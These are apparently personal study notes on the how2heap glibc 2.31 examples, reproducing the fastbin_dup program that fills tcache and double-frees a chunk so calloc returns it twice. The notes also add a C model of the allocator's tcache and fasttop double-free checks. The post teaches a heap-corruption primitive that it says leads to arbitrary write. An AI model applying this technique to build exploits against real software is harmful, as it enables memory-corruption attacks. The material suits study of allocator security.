how2heap libc 2.31 study notes

  Today is April 19, and I want to work through the newer-version (2.31) examples in how2heap before May. So this series is still being updated. If an example is simple I will cover it in a few sentences; when I run into a harder one I will write it up in more detail.

fastbin_dup

Source code:

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
    setbuf(stdout, NULL);

    printf("This file demonstrates a simple double-free attack with fastbins.\n");

    printf("Fill up tcache first.\n");
    void *ptrs[8];
    for (int i=0; i<8; i++) {
        ptrs[i] = malloc(8);
    }
    for (int i=0; i<7; i++) {
        free(ptrs[i]);
    }

    printf("Allocating 3 buffers.\n");
    int *a = calloc(1, 8);
    int *b = calloc(1, 8);
    int *c = calloc(1, 8);

    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    printf("3rd calloc(1, 8): %p\n", c);

    printf("Freeing the first one...\n");
    free(a);

    printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    printf("So, instead, we'll free %p.\n", b);
    free(b);

    printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    a = calloc(1, 8);
    b = calloc(1, 8);
    c = calloc(1, 8);
    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    printf("3rd calloc(1, 8): %p\n", c);

    assert(a == c);
}

Summary:

  1. Requesting a chunk with calloc does not take the chunk from tcache.

  2. If a UAF vulnerability exists, you can first fill the tcache, then use the sequence free(a), free(b), free(a) to achieve a double free, and from there an arbitrary write.
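Why the commented-out second free(a) would abort while free(a), free(b), free(a) goes through: the following is an added userland model (not how2heap code and not glibc's own source) of the two free() checks that decide this in 2.31, the tcache e->key double-free check and the fastbin fasttop check. The chunk layout, the 7-slot limit and the key value are simplified assumptions; calloc is modelled as popping from the fastbin because it skips tcache.

```c
/* Added example, not how2heap code: a userland model of the glibc 2.31 free() checks
 * that matter for fastbin_dup: one tcache bin (7 slots, e->key check) and one fastbin
 * (fasttop check). Sizes, alignment and real chunk headers are deliberately omitted. */
#include <stddef.h>
#define TCACHE_MAX 7
#define TCACHE_KEY 0x7c     /* stands in for the tcache pointer glibc stores as e->key */
typedef struct chunk { struct chunk *fd; unsigned key; } chunk;
enum { OK = 0, ERR_TCACHE_DOUBLE_FREE = 1, ERR_FASTTOP = 2 };
static chunk *tcache[TCACHE_MAX];
static int tcache_count;
static chunk *fasttop;      /* head of the singly linked fastbin */

void model_reset(void) { tcache_count = 0; fasttop = NULL; }

/* free(): tcache key check, then tcache_put if there is room, else the fastbin path */
int model_free(chunk *p) {
    if (p->key == TCACHE_KEY)             /* possible double free: scan the tcache bin */
        for (int i = 0; i < tcache_count; i++)
            if (tcache[i] == p) return ERR_TCACHE_DOUBLE_FREE; /* "double free detected in tcache 2" */
    if (tcache_count < TCACHE_MAX) { p->key = TCACHE_KEY; tcache[tcache_count++] = p; return OK; }
    if (fasttop == p) return ERR_FASTTOP; /* "double free or corruption (fasttop)" */
    p->fd = fasttop; fasttop = p;         /* only the head is compared: a, b, a gets through */
    return OK;
}

/* calloc() in 2.31 does not take from tcache, so it pops the fastbin head */
chunk *model_calloc(void) { chunk *p = fasttop; if (p) fasttop = p->fd; return p; }

static void fill_tcache(chunk *fill) { model_reset(); for (int i = 0; i < TCACHE_MAX; i++) model_free(&fill[i]); }

/* the how2heap sequence: returns 1 if calloc hands out chunk a twice */
int run_fastbin_dup(void) {
    chunk fill[TCACHE_MAX] = {{0}}, a = {0}, b = {0};
    fill_tcache(fill);
    if (model_free(&a) != OK || model_free(&b) != OK || model_free(&a) != OK) return 0;
    chunk *x = model_calloc(), *y = model_calloc(), *z = model_calloc();
    return x == &a && y == &b && z == &a;
}

/* free(a); free(a) right after filling tcache: the fasttop check catches it */
int direct_double_free(void) {
    chunk fill[TCACHE_MAX] = {{0}}, a = {0};
    fill_tcache(fill); model_free(&a);
    return model_free(&a);
}

/* free(t); free(t) while tcache still has room: the key check catches it */
int tcache_double_free(void) {
    chunk t = {0}; model_reset(); model_free(&t);
    return model_free(&t);
}
```

The model also shows why filling tcache is a precondition: with room left in tcache, the key check would catch the repeated free, and only the fastbin path compares just the list head.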
